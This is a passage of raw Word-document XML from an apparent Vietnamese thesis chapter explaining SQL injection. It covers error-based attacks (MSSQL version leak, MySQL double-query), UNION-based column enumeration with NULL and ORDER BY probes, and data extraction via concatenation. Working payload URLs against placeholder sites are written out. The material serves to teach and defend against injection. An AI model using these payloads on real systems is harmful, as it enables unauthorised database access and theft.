              <w:br/>
              <w:t>that corresponds to your MySQL server version for the right syntax to use</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:br/>
              <w:t>near ’’ at line 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">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 Một dạng mã tấn công như sau: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="001067FE" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>http://www.vuln-s</w:t>
      </w:r>
      <w:r w:rsidR="003F7098" w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ite.com/authorprofile.asp?id=46 and 1=convert(int,@@version)—</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5F806ACB" wp14:editId="5C8DC569">
            <wp:extent cx="5743575" cy="1885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3"/>
                    <a:srcRect r="3806" b="17308"/>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4" w:name="_Toc459819431"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="003F7098" w:rsidRPr="005D3C52">
        <w:t>Lấy thông tin phiên bản MSSQL Server</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidR="003F7098" w:rsidRPr="005D3C52">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">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 thông tin về tên bảng, tên cột:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F69FA" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="004F69FA">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45DB3AEA" wp14:editId="067000D2">
            <wp:extent cx="5972175" cy="21304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5972175" cy="213042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5" w:name="_Toc459819432"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="003F7098" w:rsidRPr="005D3C52">
        <w:t>Lấy thông tin về tên CSDL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>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14:anchorId="11DC3BA7" wp14:editId="48E93475">
            <wp:extent cx="5972175" cy="20262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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5972175" cy="202628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6" w:name="_Toc459819433"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="003F7098" w:rsidRPr="005D3C52">
        <w:t>Lấy thông tin về tên bảng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Đối với MySQL, có một kỹ thuật được phát triển dựa trên dạng Error base đó là Double Query. Mã tấn công có dạng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www.vuln-web.com/photo.php?id=1' and (select 1 from (Select count(*),Concat((</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>&lt;Your Query here to return single row&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:t>),0x3a,floor(rand (0) *2))y from information_schema.tables group by y) x)-- -</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Tấn công khai thác điểm yếu trong việc không thể group by trên một cột mà các dữ liệu bị trùng (duplicate value). Bằng việc tạo ra một cột gồm các giá trị trùng 1,2 rồi group by, buộc MySQL đưa ra thông báo lỗi: Duplicate entry '</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>&lt;Your Output here&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:1' for key 'group_key'. Trong đó &lt;Your Output here&gt; là kết quả của câu truy vấn.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Ngày nay, dạng tấn công sử dụng thông báo lỗi rất hiếm gặp. Bởi vì điều kiện để có thể in ra thô</w:t>
      </w:r>
      <w:r w:rsidR="003633C3">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>g báo lỗi này đòi hỏi hệ thống phải bật cấu hình cho phép hiển thị lỗi, thông thường là trong chế độ debug. Trong khi các ứng dụng thực tế, thông thường khi đưa vào khai thác đều tắt chế độ này.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00945280">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc459822493"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t>Tấn công sử dụng mệnh đề UNION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Một trong những câu lệnh được các quản trị CSDL –DBA ưu thích sử dụng là UNION. Mệnh đề này cho phép ghép nối hai, hoặc nhiều mệnh đề SELECT lại. Cú pháp cơ bản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column-1,column-2,…,column-N FROM table-1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:t>UNION</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:t>SELECT column-1,column-2,…,column-N FROM table-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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column-1,column-2,…,column-N FROM table-1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:t>UNION ALL</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:t>SELECT column-1,column-2,…,column-N FROM table-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Điều này cho phép </w:t>
      </w:r>
      <w:r w:rsidR="00B649B0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>kẻ tấn công</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> lợi dụng trong tấn công SQL injection. Nếu ứng dụng trả về các kết quả trong câu lệnh truy vấn đầu tiên, thì bằng cách inject thêm mệnh đề UNION và mệnh đề SELECT phía sau, </w:t>
      </w:r>
      <w:r w:rsidR="00B649B0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>kẻ tấn công</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> có thể đọc được tùy ý các bảng khác (nếu tài khoản được cấu hình trên DBMS được phép truy cập). Tuy nhiên, việc sử dụng mệnh đề UNION này cũng phải tuân theo một số rule bắt buộc sau. Các mệnh đề UNION phải thỏa mãn:</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Hai câu truy vấn (SELECT) phải trả về số cột bằng nhau.</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Dữ liệu trong từng cột phải cùng loại, hoặc ít nhất tương thích với nhau.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">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w:t>
      </w:r>
      <w:r w:rsidR="00B649B0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>luận văn</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> sẽ không đi sâu vào vấn đề này. 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Có hai phương pháp chính được sử dụng. Một là tăng dần số lượng cột cho đến khi câu truy vấn thực hiện không lỗi (trả về kết quả). Trên hầu hết các DBMS (từ Oracle 8i trở về trước) có thể sử dụng giá trị NULL cho mỗi cột, và đương nhiên NULL có thể chuyển sang bất kỳ dữ liệu nào. Điều này cho phép thỏa mãn cả điều kiện trên. Để ví dụ, </w:t>
      </w:r>
      <w:r w:rsidR="00B649B0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>kẻ tấn công</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> có thể thực hiện như sau: Liên tục gọi các URL cho đến khi kết quả hợp lệ được trả về.</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w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:br/>
              <w:t>http://www.victim.com/products.asp?id=12+union+select+null,null--</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:br/>
              <w:t>http://www.victim.com/products.asp?id=12+union+select+null,null,null--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Lưu ý rằng trong Oracle yêu cầu mỗi câu lệnh sử dụng SELECT phải chứa một FORM cụ thể, nên có thể thay đổi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from+dual--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Dual là một bảng được truy cập từ mọi người dùng, và có thể được sử dụng khi không cần quan tâm đến một bảng cụ thể nào cả. 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w:t>
      </w:r>
      <w:r w:rsidR="00F86F13">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ố cột trong ORDER BY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order+by+1</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:br/>
              <w:t>http://www.victim.com/products.asp?id=12+order+by+2</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:br/>
              <w:t>http://www.victim.com/products.asp?id=12+order+by+3 etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Nếu như nhận được thông báo lỗi đầu tiên khi ORDER BY 6, có nghĩa là có 5 cột. Sau khi xác định được số cột thì vấn đề tiếp theo là xác định từng kiểu dữ liệu của cột. Giả sử là kiểu dữ liệu cần lấy về dạng strings, thì cần phải tìm ít nhất một cột có dạng dữ liệu này. Nếu như sử dụng kiểu NULL, đơn giản là chỉ cần thay thế một cột tại một lần. Ví dụ thấy rằng truy vấn có 4 cộ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test’,NULL,NULL,NULL</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:br/>
              <w:t>http://www.victim.com/products.asp?id=12+union+select+NULL,‘test’,NULL,NULL</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:br/>
              <w:t>http://www.victim.com/products.asp?id=12+union+select+NULL,NULL,‘test’,NULL</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:br/>
              <w:t>http://www.victim.com/products.asp?id=12+union+select+NULL,NULL,NULL,‘test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Nếu không có thông báo lỗi nào trả về, </w:t>
      </w:r>
      <w:r w:rsidR="00B649B0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>kẻ tấn công</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> biết rằng giá trị test sẽ được trả về trong một cột nào đó. Ví dụ đó là cột thứ hai, khi đó nếu như muốn lấy tên một người sử dụng hiện tại (tài khoản DBMS) thì thực hiện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NULL,NULL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="0034667B">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004F69FA" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="004F69FA">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="358E4E96" wp14:editId="2F69A16B">
            <wp:extent cx="4890770" cy="2571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6"/>
                    <a:srcRect r="-708" b="29548"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4890770" cy="257175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8" w:name="_Toc459819434"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="003F7098" w:rsidRPr="005D3C52">
        <w:t>Kết quả trả về của mệnh đề UNION.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Như vậy bảng mới đã chứa thông tin mà </w:t>
      </w:r>
      <w:r w:rsidR="00B649B0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">kẻ tấn công </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>cần lấy: thông tin tài khoản hiện tại. Từ đây dễ dàng thực hiện các bước tấn công khác để lấy nhiều thông tin khác. Tuy nhiên, cần chú ý rằng có một số kỹ thuật nhỏ khác trong việc sử dụng UNION. Đầu tiên là trong ví dụ trước, có bốn cột, do đó, có thể thay th</w:t>
      </w:r>
      <w:r w:rsidR="00F86F13">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ế</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> để lấy dữ liệu từ cả thêm một cột khác:</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db_name(),NULL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Tuy nhiên không phải lúc nào cũng có thể sử dụng được cột khác, có khi chỉ là một cột, trong khi lại có nhiều dữ liệu cần phải trích xuất. Để có thể nhanh hơn có thể sử dụng toán tử ghép nối (concatenation) để nối các mảnh dữ liệu lại. Ví dụ đối với MSSQL Server:</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NULL, system_user + ‘ | ’ + db_name(), NULL, NULL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Câu lệnh sẽ ghép nối kết quả của system_user và db_name(), với ký tự ‘|’ để phân biệt. Như vậy </w:t>
      </w:r>
      <w:r w:rsidR="00B649B0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>kẻ tấn công</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> đã thêm một trường dữ liệu vào chung một cột, chuyển thành dạng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2B‘+|+’%2Bdb_name(),NULL,NULL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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14:anchorId="02623FF2" wp14:editId="0E3BD1A0">
            <wp:extent cx="5972175" cy="31864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7"/>
                    <a:srcRect t="28757"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5972175" cy="318643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29" w:name="_Toc459819435"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="003F7098" w:rsidRPr="005D3C52">
        <w:t>Kết quả ghép nối dữ liệu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Bằng việc sử dụng các câu lệnh khác, </w:t>
      </w:r>
      <w:r w:rsidR="006E25A7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>kẻ tấn công</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> có thể khai thác, đọc dữ liệu từ một bảng bất kỳ. Tuy nhiên, trong một số trường hợp, kết quả truy vấn không trả về trong dạng HTML trong trình duyệt người dùng.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00945280">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc459822494"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t>Tấn công Out of Band Channel</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Trong nhiều trường hợp của SQL injection, ứng dụng không trả lại kết quả của bất kỳ câu truy vấn trong trình duyệt của người dùng, và cũng không trả lại bất kỳ thông báo lỗi tạo ra bởi các CSDL. Trong tình huống này, ngay cả khi lỗ hổng SQL injection tồn tại cũng không chắc chắn có thể trích xuất được dữ liệu, hoặc thực hiện một hành động khác. Có thể sử dụng một số kỹ thuật để nhận về kết quả của câu truy vấn, để xác định việc thực hiện có thành công hay không.</w:t>
      </w:r>
    </w:p>
